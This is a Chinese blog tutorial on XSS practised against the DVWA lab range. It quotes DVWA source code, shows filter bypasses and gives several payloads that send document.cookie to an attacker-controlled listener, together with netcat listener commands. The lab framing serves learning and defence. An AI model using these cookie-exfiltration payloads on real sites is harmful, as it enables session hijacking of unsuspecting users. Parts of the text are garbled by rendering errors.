结合DVWA靶场学习XSS漏洞-盗取cookie

最新推荐文章于 2023-05-19 08:26:06 发布
最新推荐文章于 2023-05-19 08:26:06 发布
阅读量3k 收藏 24
点赞数 4
分类专栏: WEB安全 文章标签: js web 安全 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LUOBIKUN/article/details/108934858
版权

参考

XSS攻击进阶篇——那些年我们看不懂的XSS
通过浏览器编码深入探究XSS绕过
DVWA-XSS学习笔记

前置知识:

想要深入理解XSS,必须要精通javascript。

定义

XSS(Cross Site Scripting),跨站脚本攻击,是指攻击者在网页中嵌入客户端脚本,通常是恶意的javascript代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。属于\客户端攻击。

分类

XSS分为反射型XSS,存储型XSS和DOM型XSS。

反射型XSS:

只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要去诱使用户点击一个恶意链接,才能攻击成功。
反射型XSS原理图
在这里插入图片描述

存储型XSS

将用户输入的数据存储在服务器端,每次用户访问都会被执行js脚本。
存储型XSS攻击原理图:
在这里插入图片描述

DOM型XSS

DOM简介

DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些是用户可以操纵的,如uRI,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM—based XSS漏洞。

DOM型的xss不像反射型xss和存储型xss那样会与后台交互,DOM型xss的实现过程都是在前台

文本对象模式xss,通过修改页面的DOM节点形成的XSS,可存储型,可反射型,只取决于输出地点。

可能触发DOM型XSS的属性:

document.referer 属性
window.name 属性
location 属性
innerHTML 属性
documen.write 属性

危害

JavaScript能做到什么效果,XSS的威力就有多大。
JavaScript可以用来获取用户的cookie、改变网页内容、URL调转,那么存在XSS的网站,就可以盗取用户的cookie,黑掉页面,导航到恶意网站。

防御

对用户的输入(和URL参数)进行过滤,对输出进行html编码

练习(DVWA靶场)

反射型:

DVWA-low

查看源代码,可以看到没有对参数做任何防御处理措施,直接输出

一般的XSS攻击
<script>alert('xss1')</script>

在这里插入图片描述

 <script>alert(/xss1/)</script>

在这里插入图片描述

<body onload=alert('xss2')> 

在这里插入图片描述

<body onload=alert(/xss2/)>

在这里插入图片描述

<a href='' onclick=alert('xss3')>click1</a>

#点击click1时弹出xss3
  
在这里插入图片描述

<img src=http://192.168.10.128/a.jpg onerror=alert('xss4')>

#src地址错误,然后执行onerror的内容

在这里插入图片描述

重定向:
<script>window.location='http://www.163.com'</script>

执行后重定向
  
在这里插入图片描述

<iframe src='http://192.168.10.141/a.jpg' height='0' width='0'><iframe>

……

获取cookie
方法1

直接获取cookie

<script>alert(document.cookie)</script>

在这里插入图片描述

方法2
<script>new Image().src="http://10.1.8.142:8888/?output="+document.cookie;</script>

在10.1.8.142上开启监听

nc  -lvp   8888

在这里插入图片描述

方法3
<script>var img=document.createElement('img');img.src='http://10.1.8.1:88/log?'+escape(document.cookie);</script>

在10.1.8.142上开启监听

nc  -lvp   88

在这里插入图片描述

方法4

加载远端服务器的js脚本

制作一个js脚本,getcookie.js

var img=new Image();
img.src='http://192.168.10.143/:8888/cookie.php?cookie='+document.cookie';

把js脚本放到web站点中,开启web服务

在DVWA栏中输入

<script src=http://192.168.10.143/getcookie.js></script>

在192.168.10.143主机上开启监听,当有用户访问DVWA中存储型xss页面时,就会把cookie信息发送到主机上
在这里插入图片描述
这里我没成功,直接·抄录的参考博客的

DVWA-medium


<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>
分析

可以看到使用str_replace函数只对参数进行了简单的替换,过滤

绕过
大小写绕过
<Script>alert('xss01')</script>

在这里插入图片描述

组合过滤条件绕过
<scr<script>ipt>alert(' xss02')</script>

在这里插入图片描述

尝试使用别的标签来绕过
<body onload=alert('xss03')>

在这里插入图片描述

<a href='' onclick=alert('xss04')>click</a>

在这里插入图片描述

DVWA-High


<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>
分析

使用了preg_replace正则表达式函数,对参数进行过滤,查看源码可以看到对

绕过

使用别的标签

<body onload=alert('xss10')>

在这里插入图片描述

<img src="" onerror=alert('xss11')>

在这里插入图片描述

<a href='' onclick=alert('xss12')>click</a>

在这里插入图片描述

DVWA-Impossible

使用htmlspecialchars函数对参数进行html实体转义,此时就无法利用XSS漏洞了

存储型XSS

DVWA-low


<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>
分析

首先对两个参数使用trim函数过滤掉两边的空格,然后KaTeX parse error: Undefined control sequence: \” at position 70: …ipslashes函数过滤掉”\̲”̲,对name参数中使用mysql_real_escape_string函数转义SQL语句中的特殊字符
没有防御XSS漏洞,只防御了SQL注入漏洞

一般的XSS攻击

在message栏中测试:(提交以后刷新一下)

<script>alert('xss21')</script>

在这里插入图片描述

<body onload=alert('xss22')>

在这里插入图片描述

<a href='' onclick=alert('xss23')>click</a>

在这里插入图片描述

重定向:
<a href=http://www.baidu.com>clock</a>

<script>window.location=’http://www.baidu.com’</script>

<iframe src='http://192.168.10.10.141/a.jpg' height='0' width='0'></iframe>

……

获取cookie:
方法1

在DVWA message栏中设置字节长度,输入

<script>new Image().src="http://10.1.8.1:9999/?output="+document.cookie;</script>

然后在操作机中开启监听,

nc  -lvp  9999

在这里插入图片描述

在这里插入图片描述

或者换一个浏览器访问DVWA中存储型XSS,也是可以的。

方法2
<script>var img=document.createElement('img');img.src='http://10.1.8.1:1000/log?'+escape(document.cookie);</script>

//ip为自己操作机IP

nc   -nlvp    1000

//操作机监听端口
在这里插入图片描述
在这里插入图片描述

方法3

加载远端服务器的js脚本

制作一个js脚本,getcookie.js

var img=new Image();
img.src='http://192.168.10.143/:8888/cookie.php?cookie='+document.cookie';

把js脚本放到web站点中,开启web服务

在DVWA栏中输入

<script src=http://192.168.10.143/getcookie.js></script>

在192.168.10.143主机上开启监听,当有用户访问DVWA中存储型xss页面时,就会把cookie信息发送到主机上
在这里插入图片描述
这里我没成功,直接·抄录的参考博客的

DVWA-medium


<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>
分析

m e s s a g e 参 数 做 了 很 严 格 的 过 滤 ( 进 行 h t m l 实 体 转 义 以 及 转 义 S Q L 语 句 中 使 用 的 特 殊 字 符 , 杜 绝 了 对 message参数做了很严格的过滤(进行html实体转义以及转义SQL语句中使用的特殊字符,杜绝了对 message(htmlSQL使message关于xss的利用),但对 n a m e 参 数 做 的 过 滤 不 严 格 , 只 是 替 换 < s c r i p t > 以 及 转 义 S Q L 语 句 中 使 用 的 特 殊 字 符 , 可 以 使 用 别 的 h t m l 标 签 对 name参数做的过滤不严格,只是替换<script>以及转义SQL语句中使用的特殊字符,可以使用别的html标签对 name,<script>SQL使,使htmlname参数的防护进行绕过

绕过

例如:

<Script>alert('xss123')</script>

在这里插入图片描述

在这里插入图片描述
以下同理:

<body onload=alert('xss')>

<a href='' onclick=alert('xss')>click</a>

DVWA-High

1.分析源码,可以看到相比较中级而言,高级对$nam参数多了对

click ### DVWA-Impossible 分析源码可以看到,对两个参数都做了html实体转义,无法利用xss 

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = stripslashes( $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $name = htmlspecialchars( $name );

    // Update database
    $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
    $data->bindParam( ':message', $message, PDO::PARAM_STR );
    $data->bindParam( ':name', $name, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

DOM型XSS

DVWA-low

dvwa下的dom型xss页面的意思是选择一种语音,只在前端执行,且代码并未对default进行处理。

一般的XSS攻击

源码并未做任何安全防护措施,所以可以直接在url上构造攻击脚本
例如,构造脚本:

default=English<script>alert("xss31")</script>

在这里插入图片描述

重定向:

例如:

default=English

获取cookie
方法1

直接获取cookie

default=English <script>alert(document.cookie)</script>

在这里插入图片描述

方法2
default=English <script>new Image().src="http://10.1.8.1:1234/?output="+document.cookie;</script>

在10.1.8.1上开启监听

nc -nvlp 1234

在这里插入图片描述

方法3
default=English <script>var img=document.createElement('img');img.src='http://10.1.8.1:5678/log?'+escape(document.cookie);</script>

10.1.8.1上开启监听

Nc -nvlp 5678`

在这里插入图片描述
或者远程调用JS也同理。

DVWA-medium


<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>

漏洞分析:

array_key_exists检查数组里是否有指定的键名和索引,如果default值不为null,default的值就等于获取到的default。
stripos返回default中字符串<script首次出现的位置(不区分大小写),如果有,则default的值等于English,所以这里用

default=</option></select><body onload=alert('xss32')> 

在这里插入图片描述

DVWA-high


<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?>

漏洞分析:

源码先判断default值是否为空,若不空,则用switch语句进行匹配,匹配成功,则插入case字段相应值,如果匹配不成功,则执行default语句。可在?default=English设置#字符,因为#之后的字符串不会被发送到服务器,而script语句就可以在前端页面实现。

例如,构造脚本:

?default=English#<script>alert('xss33')</script>

在这里插入图片描述

Oriental r0se
关注
  • 4
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【渗透练习系列】DVWA靶机实战,通过XSS盗取cookie登录-02
书山上的云的博客
03-16 7562
一、发现XSS漏洞 1.1 登录DVWA,找到XSS(DOM)模块,测试XSS是否存在。 1.2 在选项的传参后面加入一串js代码,也就是可以XSS弹出的代码。payload如下: <script>alert(/xss/)</script> 发现可以弹窗,证明此处存在XSS。 二、盗取cookie 2.1 在XSS平台上搭建一个测试项目。这里用的是免费的XSS平台: https://xssaq.com/xss.php 选择【我的项目】->【创建】,创建一个测试项目: 2.2
DVWA靶场+BEEFxss平台复现XSS脚本攻击(获取cookie,跳转指定网页)
weixin_73180072的博客
09-18 513
1.kali搭建安装好beef2.win10搭建好dvwa靶场
基于dvwa的反射性xss获取其中的cookie分享篇
weixin_47319512的博客
05-10 1399
好切回正题,这段代码的是正则表达意思就是把这些'/
基于dvwa的存储性xss获取其中的cookie分享篇
weixin_47319512的博客
05-12 487
首先我们启动靶场,把难度级别调整到low,然后选择存储xxs,进入页面。
XSS基础及实战(XSS提取cookie并登录的)
qidiandexiaowu
09-06 8454
该学新知识了! 目录XSS基础XSS分类反射型XSS的利用 XSS基础 XSS的定义:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 XSS分类 XSS有三类:反射型X
DVWA靶场 XSS
Lee_yc的博客
09-13 1531
1、正常注入是肯定不行了,直接查看源代码,发现只能从name字段注入,而且不能使用标签,这时就想着使用 等标签。5、也可以使用双写script标签的方法,绕过限制 alert("xss success!")") 双写标签绕过。3、大写标签进行绕过,alert("xss success!
2.XSS漏洞(获取用户的cookie)——小白笔记——DVWA
qwsn
11-17 2442
0x01:用户的cookie 1.cookie:在浏览器端存储用户身份信息的一种机制 2.用户信息包含:用户名和密码(经过加密处理保存在cookie里) 0x02:检测实例1 1.检测1: <script>alert('hack u')</script> //检测 2.检测2: <script>for(var i=0;i<100000;i...
XSS漏洞利用——获取cookie
cxrpty的博客
02-20 1745
实验环境:DVWA 实验步骤: 一、在服务器创建一个1.php文件获取cookie值,并将cookie值写入1.txt中 php代码如下: <?php $file=fopen("1.txt","a"); if($_GET['cookie']){ $cookie=$_GET['cookie']; fputs($file,"$cookie\r\n"); } ?> ...
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞
DVWA靶场环境搭建-dvwa.rar
10-15
DVWA靶场环境文件
xss-dvwa靶场详情
最新发布
04-06
dvwa靶场中的xss漏洞详情
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
### DVWA-安装-漏洞测试-漏洞修复指南 #### 安装与配置 根据文档描述,为了使用DVWA(Damn Vulnerable Web Application)进行漏洞测试,首先需要安装XAMPP或WampServer作为Web服务器环境。以下是安装步骤的概述: ...
DVWA靶场,集成了owasp top 10漏洞
03-28
通过DVWA靶场学习,你可以深入了解这些漏洞,提升自己的渗透测试技能,并了解如何为实际环境中的Web应用程序构建更强大的安全防护。同时,对于开发人员来说,这是一个绝佳的平台,可以用来增强对安全编码的理解,...
DVWA测试XSS跨站脚本攻击三种类型
WINDY_PACE的博客
05-04 1758
测试XSS三种类型危害最大的存储型如何无声息钓鱼获取到用户信息
【网络安全XSSCookie外带攻击姿势及例题详析
等风来
05-19 7160
XSSCookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
XSS漏洞攻击&绕过
weixin_61143354的博客
09-18 1271
网络安全笔记
XSS跨站脚本
rita_rweb的博客
09-13 1038
XSS(跨站脚本) XSS是一种发生在前端浏览器端的漏洞,危害对象也是前端用户,形成XSS漏洞的主要原因是程序对输入输出没有做合适的处理,导致精心构造的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。 因此在XSS漏洞的防范上一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理。 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入。 输出转义:根据输出点的位置对输出到前端的额呢绒进行适当转义。 反射性xss(get) 随意输入字符串,回显who is xxx,i don’t
xss利用之获取管理员cookie
weixin_48421613的博客
08-27 3091
xss利用之获取后台管理员cookie 首先需要声明的是,我们这次讲解的小案例是开源的一个环境,并不是盲打xss,也就是说我们是可以在自己的服务器上搭建环境而后进行一系列的测试 现我们在靶场找到存储型(持久型)xss注入,我们该如何通过xss获取超级管理员的cookie从而登录后台呢? 通过测试,我们得知在留言板的title(标题 )处存在存储型xss注入,通过后台访问可以执行script代码 - 我们通过观察,得知body(内容)内的script代码被过滤,但是title内的被执行了
Burpsuite超详细安装教程
热门推荐
LUOBIKUN的博客
02-01 24万+
Burpsuite的超详细安装教程 Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。 接下来我来给大家详细介绍一下如何在WINDOWS平台下安装Burpsuite。 一,首先我们要配置JAVA环境 因为burpsu...
dvwa靶场测试xss攻击
09-20
DVWA靶场进行XSS攻击测试时,可以使用存储型XSS漏洞利用的方法。首先,测试靶场的接口是否过滤了`<script>`标签,可以构造payload来判断是否存在渗透点。如果接口没有过滤`<script>`标签,可以构造恶意代码来获取用户的cookie等信息。 存储型XSS攻击与反射型XSS攻击的区别在于,存储型XSS攻击能够将恶意代码长期嵌入到页面中,所有访问此页面的用户都会成为受害者,而反射型XSS攻击则是通过构造特定的URL,将恶意代码注入到URL参数中,当用户点击包含恶意代码的URL时才会触发攻击。 XSS(跨站脚本攻击)是一种利用网页漏洞,将恶意脚本注入到网页中,从而获取用户信息、劫持会话、传播恶意链接等的攻击方式。 DVWA靶场是一个用于演示和测试各种Web应用安全漏洞的虚拟环境,其中包含了多种XSS漏洞供用户测试和学习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值